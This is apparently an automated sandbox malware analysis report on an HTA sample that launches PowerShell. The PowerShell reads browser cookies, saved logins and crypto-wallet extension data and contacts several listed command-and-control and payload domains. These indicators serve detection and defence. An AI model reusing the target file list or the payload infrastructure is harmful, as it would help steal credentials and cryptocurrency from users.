                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior

                          Remote Access Functionality

                          barindex
                          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                          Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                          Source: Yara matchFile source: 5.2.powershell.exe.c973628.4.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.2.powershell.exe.c973628.4.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000005.00000002.2712557949.000000000C911000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 5.2.powershell.exe.c973628.4.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.2.powershell.exe.c973628.4.raw.unpack, type: UNPACKEDPE
                          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                          Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                          Windows Management Instrumentation
                          1
                          DLL Side-Loading
                          1
                          DLL Side-Loading
                          211
                          Deobfuscate/Decode Files or Information
                          2
                          OS Credential Dumping
                          11
                          File and Directory Discovery
                          Remote Services11
                          Archive Collected Data
                          3
                          Ingress Tool Transfer
                          Exfiltration Over Other Network MediumAbuse Accessibility Features
                          CredentialsDomainsDefault Accounts2
                          Command and Scripting Interpreter
                          Boot or Logon Initialization Scripts111
                          Process Injection
                          3
                          Obfuscated Files or Information
                          LSASS Memory22
                          System Information Discovery
                          Remote Desktop Protocol41
                          Data from Local System
                          21
                          Encrypted Channel
                          Exfiltration Over BluetoothNetwork Denial of Service
                          Email AddressesDNS ServerDomain Accounts4
                          PowerShell
                          Logon Script (Windows)Logon Script (Windows)3
                          Software Packing
                          Security Account Manager211
                          Security Software Discovery
                          SMB/Windows Admin Shares1
                          Screen Capture
                          4
                          Non-Application Layer Protocol
                          Automated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                          DLL Side-Loading
                          NTDS1
                          Process Discovery
                          Distributed Component Object Model1
                          Email Collection
                          115
                          Application Layer Protocol
                          Traffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                          Masquerading
                          LSA Secrets221
                          Virtualization/Sandbox Evasion
                          SSH2
                          Clipboard Data
                          Fallback ChannelsScheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts221
                          Virtualization/Sandbox Evasion
                          Cached Domain Credentials1
                          Application Window Discovery
                          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items111
                          Process Injection
                          DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
                          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1584778 Sample: title.mp4.hta Startdate: 06/01/2025 Architecture: WINDOWS Score: 100 35 quantitypitt.click 2->35 37 cabf.klipdesak.shop 2->37 39 klipvumisui.shop 2->39 47 Suricata IDS alerts for network traffic 2->47 49 Found malware configuration 2->49 51 Malicious sample detected (through community Yara rule) 2->51 53 17 other signatures 2->53 11 mshta.exe 1 2->11         started        signatures3 process4 signatures5 63 Encrypted powershell cmdline option found 11->63 14 powershell.exe 19 11->14         started        process6 signatures7 65 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 14->65 67 Suspicious powershell command line found 14->67 69 Found many strings related to Crypto-Wallets (likely being stolen) 14->69 71 2 other signatures 14->71 17 powershell.exe 15 13 14->17         started        21 conhost.exe 14->21         started        process8 dnsIp9 33 cabf.klipdesak.shop 104.21.16.1, 443, 49741 CLOUDFLARENETUS United States 17->33 45 Injects a PE file into a foreign processes 17->45 23 powershell.exe 17->23         started        27 conhost.exe 17->27         started        signatures10 process11 dnsIp12 41 quantitypitt.click 104.21.43.229, 443, 49953, 49960 CLOUDFLARENETUS United States 23->41 43 klipvumisui.shop 172.67.208.58, 443, 50017 CLOUDFLARENETUS United States 23->43 55 Query firmware table information (likely to detect VMs) 23->55 57 Found many strings related to Crypto-Wallets (likely being stolen) 23->57 59 Tries to harvest and steal ftp login credentials 23->59 61 2 other signatures 23->61 29 powershell.exe 7 23->29         started        signatures13 process14 process15 31 conhost.exe 29->31         started       

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand
                          SourceDetectionScannerLabelLink
                          title.mp4.hta3%VirustotalBrowse
                          title.mp4.hta0%ReversingLabs
                          No Antivirus matches
                          No Antivirus matches
                          No Antivirus matches
                          SourceDetectionScannerLabelLink
                          https://cabf.klipdesak.shop/smugle.bd0%Avira URL Cloudsafe
                          https://klipvumisui.shop/M100%Avira URL Cloudmalware
                          https://klipvumisui.shop/int_clp_ldr_sha.txtQ100%Avira URL Cloudmalware
                          https://cabf.klipdesak.shop0%Avira URL Cloudsafe
                          https://klipvumisui.shop/=100%Avira URL Cloudmalware
                          https://klipvumisui.shop/int_clp_ldr_sha.txt100%Avira URL Cloudmalware
                          https://quantitypitt.click/0%Avira URL Cloudsafe
                          quantitypitt.click0%Avira URL Cloudsafe
                          http://www.microsoft.coIl0%Avira URL Cloudsafe
                          http://crl.microsoftY0%Avira URL Cloudsafe
                          https://cabf.klipdesak.0%Avira URL Cloudsafe
                          https://quantitypitt.click/api0%Avira URL Cloudsafe
                          NameIPActiveMaliciousAntivirus DetectionReputation
                          quantitypitt.click
                          104.21.43.229
                          truetrue
                            unknown
                            cabf.klipdesak.shop
                            104.21.16.1
                            truetrue
                              unknown
                              klipvumisui.shop
                              172.67.208.58
                              truefalse
                                high
                                NameMaliciousAntivirus DetectionReputation
                                quantitypitt.clicktrue
                                • Avira URL Cloud: safe
                                unknown
                                https://quantitypitt.click/apitrue
                                • Avira URL Cloud: safe
                                unknown
                                rabidcowse.shopfalse
                                  high
                                  wholersorie.shopfalse
                                    high
                                    cloudewahsj.shopfalse
                                      high
                                      noisycuttej.shopfalse
                                        high
                                        nearycrepso.shopfalse
                                          high
                                          https://klipvumisui.shop/int_clp_ldr_sha.txtfalse
                                          • Avira URL Cloud: malware
                                          unknown
                                          https://cabf.klipdesak.shop/smugle.bdtrue
                                          • Avira URL Cloud: safe
                                          unknown
                                          framekgirus.shopfalse
                                            high
                                            tirepublicerj.shopfalse
                                              high
                                              abruptyopsn.shopfalse
                                                high
                                                NameSourceMaliciousAntivirus DetectionReputation
                                                http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.1874036208.0000000005948000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://klipvumisui.shop/int_clp_ldr_sha.txtQpowershell.exe, 0000000A.00000002.2756836913.0000000002EFA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: malware
                                                  unknown
                                                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.1870496705.0000000004A37000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.1870496705.0000000004A37000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://go.micropowershell.exe, 00000002.00000002.1870496705.0000000004BD4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://quantitypitt.click/powershell.exe, 0000000A.00000002.2755108073.0000000002EB4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://contoso.com/Licensepowershell.exe, 00000002.00000002.1874036208.0000000005948000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://contoso.com/Iconpowershell.exe, 00000002.00000002.1874036208.0000000005948000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://klipvumisui.shop/Mpowershell.exe, 0000000A.00000002.2761981583.0000000005300000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: malware
                                                            unknown
                                                            https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.1870496705.0000000004A37000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://klipvumisui.shop/powershell.exe, 0000000A.00000002.2761981583.0000000005300000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://klipvumisui.shop/=powershell.exe, 0000000A.00000002.2761981583.0000000005300000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: malware
                                                                unknown
                                                                https://aka.ms/pscore6lBpowershell.exe, 00000002.00000002.1870496705.00000000048E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2600915739.00000000054D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2766998863.0000000005231000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://www.cloudflare.com/favicon.ico/powershell.exe, 0000000B.00000002.2755371659.0000000003250000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://contoso.com/powershell.exe, 00000002.00000002.1874036208.0000000005948000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.1874036208.0000000005948000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://cabf.klipdesak.shoppowershell.exe, 00000005.00000002.2600915739.0000000005625000.00000004.00000800.00020000.00000000.sdmptrue
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://cabf.klipdesak.powershell.exe, 00000002.00000002.1876036563.000000000714B000.00000004.00000020.00020000.00000000.sdmptrue
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://www.microsoft.coIlpowershell.exe, 00000005.00000002.2633763630.0000000007A13000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://www.cloudflare.com/favicon.icopowershell.exe, 0000000B.00000002.2766998863.000000000571C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://crl.microsoftYpowershell.exe, 00000002.00000002.1876036563.000000000714B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://developers.cloudflare.com/r2/data-access/public-buckets/powershell.exe, 0000000B.00000002.2766998863.000000000571C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.1870496705.00000000048E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2600915739.00000000054D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2766998863.0000000005231000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              • No. of IPs < 25%
                                                                              • 25% < No. of IPs < 50%
                                                                              • 50% < No. of IPs < 75%
                                                                              • 75% < No. of IPs
                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                              104.21.43.229
                                                                              quantitypitt.clickUnited States
                                                                              13335CLOUDFLARENETUStrue
                                                                              104.21.16.1
                                                                              cabf.klipdesak.shopUnited States
                                                                              13335CLOUDFLARENETUStrue
                                                                              172.67.208.58
                                                                              klipvumisui.shopUnited States
                                                                              13335CLOUDFLARENETUSfalse
                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                              Analysis ID:1584778
                                                                              Start date and time:2025-01-06 13:54:06 +01:00
                                                                              Joe Sandbox product:CloudBasic
                                                                              Overall analysis duration:0h 8m 48s
                                                                              Hypervisor based Inspection enabled:false
                                                                              Report type:full
                                                                              Cookbook file name:default.jbs
                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                              Number of analysed new started processes analysed:13
                                                                              Number of new started drivers analysed:0
                                                                              Number of existing processes analysed:0
                                                                              Number of existing drivers analysed:0
                                                                              Number of injected processes analysed:0
                                                                              Technologies:
                                                                              • HCA enabled
                                                                              • EGA enabled
                                                                              • AMSI enabled
                                                                              Analysis Mode:default
                                                                              Analysis stop reason:Timeout
                                                                              Sample name:title.mp4.hta
                                                                              Detection:MAL
                                                                              Classification:mal100.troj.spyw.evad.winHTA@12/8@3/3
                                                                              EGA Information:
                                                                              • Successful, ratio: 40%
                                                                              HCA Information:
                                                                              • Successful, ratio: 90%
                                                                              • Number of executed functions: 145
                                                                              • Number of non-executed functions: 63
                                                                              Cookbook Comments:
                                                                              • Found application associated with file extension: .hta
                                                                              • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                              • Stop behavior analysis, all processes terminated
                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                              • Excluded IPs from analysis (whitelisted): 23.56.254.164, 4.175.87.197, 13.107.246.45
                                                                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                              • Execution Graph export aborted for target mshta.exe, PID 6880 because there are no executed function
